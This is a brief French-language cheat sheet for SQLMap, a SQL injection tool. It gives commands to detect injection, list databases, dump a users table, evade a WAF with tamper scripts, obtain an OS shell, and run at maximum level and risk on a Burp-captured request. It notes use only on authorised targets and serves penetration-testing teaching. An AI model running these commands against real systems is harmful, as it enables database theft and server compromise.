SQLMap — Injection SQL automatisée

SQLi Auto-exploitation

Qu'est-ce que SQLMap ?

SQLMap automatise la détection et l'exploitation des injections SQL. Il supporte MySQL, PostgreSQL, Oracle, MSSQL, SQLite... À n'utiliser que sur des cibles autorisées.

Utilisation

# Détection automatique
sqlmap -u "http://target/page?id=1" --batch

# Lister les bases de données
sqlmap -u "http://target/page?id=1" --dbs

# Extraire une table
sqlmap -u "..." -D mabase -T users --dump

# Sur un formulaire POST
sqlmap -r request.txt -p username --batch

# Bypass WAF
sqlmap --tamper=space2comment,between,randomcase

# Shell OS
sqlmap -u "..." --os-shell

Capturer la requête avec Burp

# Dans Burp : clic droit sur la requête -> Save item
# sqlmap lit directement le fichier
sqlmap -r request.txt --level=5 --risk=3